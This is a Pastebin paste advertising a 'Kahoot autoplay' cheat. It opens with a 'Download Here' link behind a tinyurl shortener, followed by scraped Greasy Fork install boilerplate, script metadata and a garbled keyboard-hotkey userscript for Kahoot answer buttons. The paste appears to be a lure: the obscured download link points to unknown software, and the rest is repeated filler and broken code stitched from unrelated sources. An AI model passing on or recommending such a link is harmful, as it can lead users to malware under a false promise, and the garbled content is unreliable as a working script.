Advertisement
Guest User

Kahoot autoplay

a guest
Nov 14th, 2024
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.36 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/46sfc2pz?id97637192 (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Greasy Fork
  10. You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.
  11. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  12. You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.
  13. You will need to install an extension such as Tampermonkey or Userscripts to install this script.
  14. You will need to install a user script manager extension to install this script.
  15. How to install
  16. You will need to install an extension such as Stylus to install this script.
  17. You will need to install an extension such as Stylus to install this script.
  18. You will need to install an extension such as Stylus to install this script.
  19. You will need to install a user style manager extension to install this script.
  20. You will need to install a user style manager extension to install this script.
  21. Author Doggo Live Daily installs 1 Total installs 457 Ratings 0 0 0 Version 1.8 Created 2022-11-14 Updated 2023-02-14 License N/A
  22. Install this script. Ensure Kahoot's autoplay option is enabled. This script is made to support Kahoot's autoplay and the "Play Next"
  23. mvolfik / kahoot-hotkeys.user.js
  24. This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
  25. // ==UserScript== // @name Kahoot hotkeys // @namespace mvolfik.github.io // @version 0.2 // @description take over the world! // @author mvolfik // @match https://kahoot.it/v2/* // ==/UserScript== ( function ( ) document . onkeypress = function ( e ) console . log ( e . keyCode ) ; switch ( e . keyCode ) case 52 : document . querySelectorAll ( "button[data-functional-selector~=answer-0]" ) [ 0 ] . click ( ) ; break ; case 53 : document . querySelectorAll ( "button[data-functional-selector~=answer-1]" ) [ 0 ] . click ( ) ; break ; case 49 : document . querySelectorAll ( "button[data-functional-selector~=answer-2]" ) [ 0 ] . click ( ) ; break ; case 50 : document . querySelectorAll ( "button[data-functional-selector~=answer-3]" ) [ 0 ] . click ( ) ; break ; > > > ) ( ) ;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement